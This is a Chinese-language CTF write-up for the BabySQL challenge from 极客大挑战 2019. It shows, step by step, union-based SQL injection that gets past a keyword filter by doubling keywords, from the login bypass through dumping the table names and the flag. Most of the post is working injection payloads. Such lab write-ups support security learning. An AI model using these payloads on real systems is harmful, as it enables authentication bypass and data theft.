首页 > 数据库 >[极客大挑战 2019]BabySQL

[极客大挑战 2019]BabySQL

时间:2024-07-22 17:51:58浏览次数:14  
标签:username 极客 group name BabySQL 2019 password seselectlect ununionion

[极客大挑战 2019]BabySQL

判断类型

SQL关键字绕过,这道题可以双写绕过。

username=1' or 1=1#

password=1' or 1=1#

得到报错:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1 #' and password='1' 1=1#'' at line 1

看得出来,password='1' 1=1#''1中间的or被过滤了

试试双写:

username=1' oorr 1=1#

password=1' oorr 1=1#

得到结果:

Hello admin!

Your password is '4c7aa7ae3b8837418b03e1c98844e89a'

获得数据库相关信息,获得flag

查看回显点个数:

username=1' oorrder bbyy 4#

报错:Unknown column '4' in 'order clause'

username=1' oorrder bbyy 3#

回显正常,说明回显点个数为3

测试回显点位置:

username=1' ununionion seselectlect 1,2,3#

回显:

Hello 2!

Your password is '3'

知道回显点之后,就可以开始套数据了

1' ununionion seselectlect 1,database(),3 #

数据库名为geek

1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

得到表名为b4bsql geekuser

1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser'#

列名都是id,username,password

1' ununionion seselectlect 1,group_concat(id,username,passwoorrd),3 frfromom b4bsql#

flag在其中

标签:username,极客,group,name,BabySQL,2019,password,seselectlect,ununionion
From: https://www.cnblogs.com/bolerat/p/18316569

相关文章

  • [CISCN 2019 初赛]Love Math
    进入之后直接就是源码<?php//关闭所有错误报告,以防止将敏感信息泄露给用户error_reporting(0);//检查是否传入了GET参数'c'//如果没有传入,则显示当前文件的源代码if(!isset($_GET['c'])){show_source(__FILE__);}else{//读取GET参数'c'的值到$c......
  • 极客时间:在AutoGen Builder中创建具有定制技能的代理
    尝试使用AutogenBuilder中的本地LLM/SLM后,下一步是探索如何在AutoGenBuilder中创建自定义技能并将其分配给代理。选择了一个从给定URL获取HTML页面的技能。以下是具体步骤:第一步:设置环境请访问“https://medium.com/the-constellar-digital-technology-blog/geek-out-tim......
  • [CISCN2019 华北赛区 Day1 Web2]ikun 1
    目录题目分析jwtjwt介绍jwt伪造picklepickle.loads()pickle.dumps()urllib.unquote()Python反序列化题目分析先注册账号,然后登录目标是买到lv6,page参数代表不同页面写个脚本寻找存在lv6的页面importrequestsurl='http://48741e8e-30ab-4b63-a3a0-be94862b22......
  • WebGoC题解(11) 627.传声(2019NHOI小乙)
    题目描述 小C节日旅游来到一个农场。农场主John和n个奶牛站在一条水平线上。牛的传递消息是依靠“吼”,牛的吼叫声最远可以传递的距离是50。农场主John首先通知最左边的第一条奶牛(一定会通知),然后奶牛就开始向后吼叫,后面的奶牛如果能听到(和前面吼叫的奶牛距离不超过50),就继续向......
  • P5520 [yLOI2019] 青原樱
    原题链接题解设花为1,花盆为0,我们先确保花之间有空隙,即\(1010....0101\)接下来再插入\(n-m-(m-1)\)个花盆进入1与1之间则有\(C_{n-m+1}^{m}\)种插法(相当于m个黑球,n个白球有几种排列方法)再乘上\(A_m\),即花与花之间排列所以答案为\(A_{n-m+1}^m\)注意,什么是A排......
  • Zabbix监控 MS SqlServer2019
    Zabbix监控MSSqlServer2019 环境:Zabbix7.0LTS,sqlserver2019 在mssqlserver的服务器上安装好agent2和插件:zabbix_agent2_plugins-7.0.0-windows-amd64.msi,其中有mssql的必要插件.zabbix_agent2-7.0.0-windows-amd64-openssl.msi,zabbix新一代收集数据的客户......
  • [GWCTF 2019]xxor
    64位,进ida第一个for循环,输入六个32位字符串,转换成整数,存到v6数组第二个for循环,函数是把低位和高位分成了两个dword,就是在一个循环中一下处理了两个数据(两个32位数据在64位数组中)然后看看这个unk_601060,32位对齐,所以里面的数据就是(2,2,3,4)接下来就是sub_400686这个加密函数可......
  • 【Web服务与Web应用开发】【C#】VS2019 创建ASP.NET Web应用程序,以使用WCF服务
    目录0.简介1.环境2.知识点3.详细过程1)创建空项目2)添加Web表单3)使用Web表单的GUI设计4)添加服务引用5)在Web的button函数中调用服务,获取PI值6)测试0.简介本文属于一个系列中的第二篇文章,这个系列会实现一个项目,这个项目主要使用VisualStudio2019作为开发工具,创建WC......
  • 题解:P10733 [NOISG2019 Prelim] Lost Array
    题解:P10733[NOISG2019Prelim]LostArray思路对于任意\(\min(X_{A_{i}},X_{B_{i}})=C_{i}\)。只要让\(X_{A_{i}}\)与\(C_{i}\)取\(\max\)值。\(X_{B_{i}}\)与\(C_{i}\)取\(\max\)值。这样可以让\(\min(X_{A_{i}},X_{B_{i}})\)绝对是\(C_{i}\)。对于为赋值......
  • wps office 2019 Pro Plus 集成序列号Vba安装版
    前言wpsoffice2019专业增强版含无云版是一款非常方便的办公软件,我们在日常的工作中总会碰到需要使用WPS的时候,它能为我们提供更好的文档编写帮助我们更好的去阅读PDF等多种格式的文档,使用起来非常的快捷方便。使用某银行专业增强版制作,包含vba和Pdf,集成序列号,去除密匙校验,去除......